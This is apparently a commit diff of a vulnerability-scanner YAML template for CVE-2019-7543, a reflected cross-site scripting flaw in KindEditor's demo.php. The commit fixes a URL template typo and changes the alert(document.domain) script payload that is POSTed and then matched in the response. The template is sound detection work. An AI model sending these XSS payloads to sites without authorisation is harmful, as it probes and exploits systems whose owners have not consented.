Update CVE-2019-7543.yaml
parent
df64158ca6
commit
4984b42e66
|
@ -13,18 +13,18 @@ info:
|
|||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}/kindeditor/php/demo.php'
|
||||
- '{{BaseURL}}/kindeditor/php/demo.php'
|
||||
- '{{BaseURL}}/php/demo.php'
|
||||
body: "content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
body: "content1=<script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
Loading…
Reference in New Issue